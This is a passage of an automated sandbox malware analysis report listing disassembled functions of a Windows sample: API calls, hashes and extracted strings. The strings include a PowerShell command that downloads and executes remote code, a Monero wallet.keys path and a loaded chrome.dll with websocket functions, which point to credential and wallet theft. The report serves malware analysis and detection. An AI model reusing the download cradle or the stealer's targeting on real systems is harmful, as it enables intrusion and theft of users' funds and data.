                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 54845bd1232c25468d7ce0d46de0a5b7eb014816e587f4654488c4eae3a472e5
                            • Instruction ID: 9659c6b95e34576fb677baae5f3f6fc89bd9c32eafbd4e53089d7d2b0d68998f
                            • Opcode Fuzzy Hash: 54845bd1232c25468d7ce0d46de0a5b7eb014816e587f4654488c4eae3a472e5
                            • Instruction Fuzzy Hash: 9B41C971E102489EDB14EBA1C8A2BEDBB79AF19300F414559E1167B193EF703A49CF91
                            Function 0014CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: dllmain_raw$dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3136044242-0
                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction ID: 625ca7633011827fe78b3f2c5a1e87ed737dffad0053298c75313a816718c3d9
                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction Fuzzy Hash: 5021A172D42618AFDBA19F59CC8197F7A79EB91BA4F054119F80967231C7308D428BE0
                            Function 000E6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 000E6C0C
                            • sscanf.NTDLL ref: 000E6C39
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E6C52
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E6C60
                            • ExitProcess.KERNEL32 ref: 000E6C7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: ed6dcff207b0e351998b3e38dc40435996fd8ba345ccf2a3795acb65c0747e01
                            • Instruction ID: d73bb518921b6465d27c51709f93a1cfa2aa6af8754739fda2f7b8f195011974
                            • Opcode Fuzzy Hash: ed6dcff207b0e351998b3e38dc40435996fd8ba345ccf2a3795acb65c0747e01
                            • Instruction Fuzzy Hash: B621BC75E1420C9FCB09DFE4E945AEEB7B9BF48300F04852AE516B3250EB35A604CB65
                            Function 000E7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7FC7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7FCE
                            • RegOpenKeyExA.ADVAPI32(80000002,00D3C470,00000000,00020119,?), ref: 000E7FEE
                            • RegQueryValueExA.ADVAPI32(?,00D4D6E0,00000000,00000000,000000FF,000000FF), ref: 000E800F
                            • RegCloseKey.ADVAPI32(?), ref: 000E8022
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 21f4f40545db5c41566ea742f5b2727365245980eb9c212136bbe4bff5eea887
                            • Instruction ID: 9badedca68cbcd46a3add7fb40e91136a86663c065da701f7b83cab2895d89c9
                            • Opcode Fuzzy Hash: 21f4f40545db5c41566ea742f5b2727365245980eb9c212136bbe4bff5eea887
                            • Instruction Fuzzy Hash: 74119EB2A44209EFD710CF85DD8AFBFBBBCEB45B10F104219F615A7280D77958008BA1
                            Function 000E93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(00D4E308,00000000,00000000,?,000D9F71,00000000,00D4E308,00000000), ref: 000E93FC
                            • lstrcpyn.KERNEL32(003A7580,00D4E308,00D4E308,?,000D9F71,00000000,00D4E308), ref: 000E9420
                            • lstrlen.KERNEL32(00000000,?,000D9F71,00000000,00D4E308), ref: 000E9437
                            • wsprintfA.USER32 ref: 000E9457
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 7bd7f695d60be5eb7fa26cbe311d12747d7412240d3925dbdd8766555f9463c8
                            • Instruction ID: d76166745d6f872df72dd4eec036cfb66b7139f483ed5bb16be30c1319192388
                            • Opcode Fuzzy Hash: 7bd7f695d60be5eb7fa26cbe311d12747d7412240d3925dbdd8766555f9463c8
                            • Instruction Fuzzy Hash: 4C01DE7560410CFFCB05DFA8CD94EAE7BB8EB4A344F108648F9099B245D731AA41DB90
                            Function 000D12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                            • RegCloseKey.ADVAPI32(?), ref: 000D12FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: bcef2c6b33a632b1c6eb2208175bc130abb4869551cba9b735dec113f80ac55c
                            • Instruction ID: 614ebb7352214466d0fb7ea5050d5bda013afb60a14eb98a00b44b575e92b9de
                            • Opcode Fuzzy Hash: bcef2c6b33a632b1c6eb2208175bc130abb4869551cba9b735dec113f80ac55c
                            • Instruction Fuzzy Hash: B901CD79A44209BFDB14DFD4DC89FAE77BCEB49701F104595FA0597280DA759A008B90
                            Function 000E68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 000E6903
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E69C6
                            • ExitProcess.KERNEL32 ref: 000E69F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: b830c863e74d09064bd4ba67458805d7bce53187a3af0a6401dd576247f19800
                            • Instruction ID: b74ab831432eb8c010c6e48b0800f9d156d9d86e4ebb58d217ebd88310110f3d
                            • Opcode Fuzzy Hash: b830c863e74d09064bd4ba67458805d7bce53187a3af0a6401dd576247f19800
                            • Instruction Fuzzy Hash: 603129B1E01258AFDB15EB91DC92FDEB778AF08300F404189F20976192DF706A48CF69
                            Function 000E8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0E10,00000000,?), ref: 000E89BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E89C6
                            • wsprintfA.USER32 ref: 000E89E0
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 1a7298f7a4d969f584127dd3e32f23545a7e5ad2d175b7c50a027cf4cd82b6e6
                            • Instruction ID: 0a89a938579d91050f6a09f9a4c181b10b5e66199e9bf89ce93e4de765c6264a
                            • Opcode Fuzzy Hash: 1a7298f7a4d969f584127dd3e32f23545a7e5ad2d175b7c50a027cf4cd82b6e6
                            • Instruction Fuzzy Hash: 882130B1A44204AFDB00DF94DD85FAEBBB8FB49710F104519F615B7280C77569008BA1
                            Function 000DA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 000DA098
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                            • API String ID: 1029625771-1545816527
                            • Opcode ID: 7ae4bcc1650d47694755ef07b700d12c65980b197710a26f8aee34bc59739633
                            • Instruction ID: 864a88c7c41d45343180c4b117571b6ed0c54c9fdbfc89c426d66ab28b0a8209
                            • Opcode Fuzzy Hash: 7ae4bcc1650d47694755ef07b700d12c65980b197710a26f8aee34bc59739633
                            • Instruction Fuzzy Hash: 75F03A7474D318EFD712EB66EC88B6636ADE347304F00051AE209972A0C7B998C8DB67
                            Function 000E8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E96AE,00000000), ref: 000E8EEB
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E8EF2
                            • wsprintfW.USER32 ref: 000E8F08
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: b656e6ee35ee04746013cc869cec30e63ab03be361a4f3926560e60207589a5f
                            • Instruction ID: f6761917ad6d0dc1a1b9e5055f4cdd0b98218726e06cd9ee7bf1e00834f5df4d
                            • Opcode Fuzzy Hash: b656e6ee35ee04746013cc869cec30e63ab03be361a4f3926560e60207589a5f
                            • Instruction Fuzzy Hash: 2BE08CB1A48308BBDB10CB94DD4AE6D77BCEB46301F000194FE0987340DA719E009B91
                            Function 000DA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DAA11
                            • lstrlen.KERNEL32(00000000,00000000), ref: 000DAB2F
                            • lstrlen.KERNEL32(00000000), ref: 000DADEC
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • DeleteFileA.KERNEL32(00000000), ref: 000DAE73
